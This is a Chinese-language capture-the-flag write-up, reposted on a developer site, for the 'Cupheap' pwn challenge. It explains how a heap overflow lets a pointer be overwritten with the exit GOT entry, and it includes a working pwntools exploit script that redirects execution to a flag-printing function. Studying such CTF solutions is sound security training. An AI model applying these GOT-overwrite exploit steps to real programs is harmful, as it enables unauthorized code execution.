3DSCTF PWN —— Cupheap
3DSCTF PWN —— Cupheap
用户1423082
发布于 2024-12-31 18:22:30
发布于 2024-12-31 18:22:30
先看保护,只开了NX
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)程序一开始malloc了四次
在内存中的结构如下
我们看到这里有个溢出
因为上面申请了8个byte,这里可以输入0x1000,那么我们可以通过第一个溢出覆盖603070指针为got表。下次再fgets就可以写got表了,因为最后会调用exit,覆盖exit的got就行
其实这题的目标是直接返回到这个函数就行了
要进入漏洞函数,需要contracts为0x1100,当他为这个值我们再利用就行
我这里本地新建了个hell文件做测试,内容是flag{test}
代码如下:
# -*- coding: utf-8 -*-
from pwn import *
# context.log_level = "debug"
elf = ELF("./cupheap")
visitHell = 0x4008F7
while 1:
p = process("./cupheap")
p.recvuntil("Give up\n")
p.sendline("1")
recv = p.recvuntil("Choose one option")
if "0x1100" in recv:
# not 1,2,3 is ok
p.sendline("6")
p.recvuntil("Visit Mausoleum\n")
p.sendline("4")
p.recvuntil("what is the name their superpowers?\n")
payload = "a" * 40
payload += p64(elf.got["exit"])
p.sendline(payload)
sleep(2)
p.sendline(p64(visitHell))
p.interactive()
else:
p.close()本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2017-12-22,如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读
腾讯云开发者
